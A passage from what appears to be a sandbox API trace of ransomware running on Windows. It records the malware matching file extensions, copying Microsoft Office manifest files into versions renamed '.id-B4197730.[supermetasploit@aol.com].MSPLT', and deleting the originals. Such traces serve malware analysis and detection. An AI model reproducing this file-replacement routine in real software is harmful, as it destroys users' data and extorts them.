4 [0181.559] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.559] lstrlenW (lpString=".bz2") returned 4 [0181.559] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.559] lstrlenW (lpString=".7z") returned 3 [0181.559] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.560] lstrlenW (lpString=".dbf") returned 4 [0181.560] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.560] lstrlenW (lpString=".1cd") returned 4 [0181.560] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.560] lstrlenW (lpString=".jpg") returned 4 [0181.560] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.561] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0181.561] lstrlenW (lpString="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 53 [0181.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0181.665] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=1261) returned 1 [0181.666] CloseHandle (hObject=0x350) returned 1 [0181.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml")) returned 0x220 [0181.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0181.666] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0181.666] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0181.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0181.890] GetLastError () returned 0x0 [0181.890] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x4ed, lpOverlapped=0x0) returned 1 [0181.894] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x4f0, lpOverlapped=0x0) returned 1 [0181.897] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0181.897] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0181.897] SetEndOfFile (hFile=0x2fc) returned 1 [0181.897] CloseHandle (hObject=0x2fc) returned 1 [0181.900] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0181.900] SetEndOfFile (hFile=0x350) returned 1 [0181.901] CloseHandle (hObject=0x350) returned 1 [0181.902] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0181.902] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml")) returned 1 [0181.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.903] lstrlenW (lpString=".doc") returned 4 [0181.903] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.903] lstrlenW (lpString=".docx") returned 5 [0181.903] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.903] lstrlenW (lpString=".pdf") returned 4 [0181.903] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.903] lstrlenW (lpString=".xls") returned 4 [0181.903] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.903] lstrlenW (lpString=".xlsx") returned 5 [0181.903] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.903] lstrlenW (lpString=".ppt") returned 4 [0181.903] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.903] lstrlenW (lpString=".zip") returned 4 [0181.903] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.903] lstrlenW (lpString=".rar") returned 4 [0181.903] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.903] lstrlenW (lpString=".bz2") returned 4 [0181.903] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.903] lstrlenW (lpString=".7z") returned 3 [0181.903] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.904] lstrlenW (lpString=".dbf") returned 4 [0181.904] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.904] lstrlenW (lpString=".1cd") returned 4 [0181.904] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.904] lstrlenW (lpString=".jpg") returned 4 [0181.904] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.904] lstrlenW (lpString=".doc") returned 4 [0181.904] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.904] lstrlenW (lpString=".docx") returned 5 [0181.904] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.904] lstrlenW (lpString=".pdf") returned 4 [0181.904] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.904] lstrlenW (lpString=".xls") returned 4 [0181.904] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.904] lstrlenW (lpString=".xlsx") returned 5 [0181.904] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.904] lstrlenW (lpString=".ppt") returned 4 [0181.904] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.905] lstrlenW (lpString=".zip") returned 4 [0181.905] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.905] lstrlenW (lpString=".rar") returned 4 [0181.905] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.905] lstrlenW (lpString=".bz2") returned 4 [0181.905] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.905] lstrlenW (lpString=".7z") returned 3 [0181.905] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.905] lstrlenW (lpString=".dbf") returned 4 [0181.905] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.905] lstrlenW (lpString=".1cd") returned 4 [0181.905] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0181.905] lstrlenW (lpString=".jpg") returned 4 [0181.905] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.905] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0181.905] lstrlenW (lpString="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 53 [0181.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0181.906] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=65002) returned 1 [0181.906] CloseHandle (hObject=0x350) returned 1 [0181.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml")) returned 0x220 [0181.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0181.906] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0181.907] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0181.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0181.907] GetLastError () returned 0x0 [0181.907] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xfdea, lpOverlapped=0x0) returned 1 [0181.911] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xfdf0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xfdf0, lpOverlapped=0x0) returned 1 [0181.916] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0181.916] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0181.916] SetEndOfFile (hFile=0x2fc) returned 1 [0181.916] CloseHandle (hObject=0x2fc) returned 1 [0182.874] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0182.889] SetEndOfFile (hFile=0x350) returned 1 [0182.890] CloseHandle (hObject=0x350) returned 1 [0182.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0182.906] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml")) returned 1 [0182.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.921] lstrlenW (lpString=".doc") returned 4 [0182.921] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.921] lstrlenW (lpString=".docx") returned 5 [0182.921] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.921] lstrlenW (lpString=".pdf") returned 4 [0182.921] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.921] lstrlenW (lpString=".xls") returned 4 [0182.921] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.921] lstrlenW (lpString=".xlsx") returned 5 [0182.921] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.921] lstrlenW (lpString=".ppt") returned 4 [0182.921] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.921] lstrlenW (lpString=".zip") returned 4 [0182.921] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.921] lstrlenW (lpString=".rar") returned 4 [0182.921] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.921] lstrlenW (lpString=".bz2") returned 4 [0182.921] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.921] lstrlenW (lpString=".7z") returned 3 [0182.921] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.921] lstrlenW (lpString=".dbf") returned 4 [0182.921] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.922] lstrlenW (lpString=".1cd") returned 4 [0182.922] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.922] lstrlenW (lpString=".jpg") returned 4 [0182.922] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.922] lstrlenW (lpString=".doc") returned 4 [0182.922] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.922] lstrlenW (lpString=".docx") returned 5 [0182.922] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.922] lstrlenW (lpString=".pdf") returned 4 [0182.922] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.922] lstrlenW (lpString=".xls") returned 4 [0182.922] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.922] lstrlenW (lpString=".xlsx") returned 5 [0182.922] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.922] lstrlenW (lpString=".ppt") returned 4 [0182.922] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.922] lstrlenW (lpString=".zip") returned 4 [0182.922] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.922] lstrlenW (lpString=".rar") returned 4 [0182.922] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.922] lstrlenW (lpString=".bz2") returned 4 [0182.923] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.923] lstrlenW (lpString=".7z") returned 3 [0182.923] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.923] lstrlenW (lpString=".dbf") returned 4 [0182.923] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.923] lstrlenW (lpString=".1cd") returned 4 [0182.923] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0182.923] lstrlenW (lpString=".jpg") returned 4 [0182.923] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.923] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0182.923] lstrlenW (lpString="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 53 [0182.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0182.924] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=1261) returned 1 [0182.924] CloseHandle (hObject=0x350) returned 1 [0182.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml")) returned 0x220 [0182.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0182.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0182.924] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0182.924] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0182.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0182.925] GetLastError () returned 0x0 [0182.925] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x4ed, lpOverlapped=0x0) returned 1 [0182.927] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x4f0, lpOverlapped=0x0) returned 1 [0182.928] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0182.928] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0182.928] SetEndOfFile (hFile=0x2fc) returned 1 [0182.929] CloseHandle (hObject=0x2fc) returned 1 [0182.936] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0182.936] SetEndOfFile (hFile=0x350) returned 1 [0182.937] CloseHandle (hObject=0x350) returned 1 [0182.938] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0182.938] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml")) returned 1 [0182.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.939] lstrlenW (lpString=".doc") returned 4 [0182.939] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.939] lstrlenW (lpString=".docx") returned 5 [0182.939] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.939] lstrlenW (lpString=".pdf") returned 4 [0182.939] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.939] lstrlenW (lpString=".xls") returned 4 [0182.939] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.939] lstrlenW (lpString=".xlsx") returned 5 [0182.939] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.939] lstrlenW (lpString=".ppt") returned 4 [0182.939] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.939] lstrlenW (lpString=".zip") returned 4 [0182.939] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.939] lstrlenW (lpString=".rar") returned 4 [0182.939] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.939] lstrlenW (lpString=".bz2") returned 4 [0182.939] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.939] lstrlenW (lpString=".7z") returned 3 [0182.939] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.939] lstrlenW (lpString=".dbf") returned 4 [0182.939] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.940] lstrlenW (lpString=".1cd") returned 4 [0182.940] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.940] lstrlenW (lpString=".jpg") returned 4 [0182.940] lstrcmpiW (lpString1=".jpg", 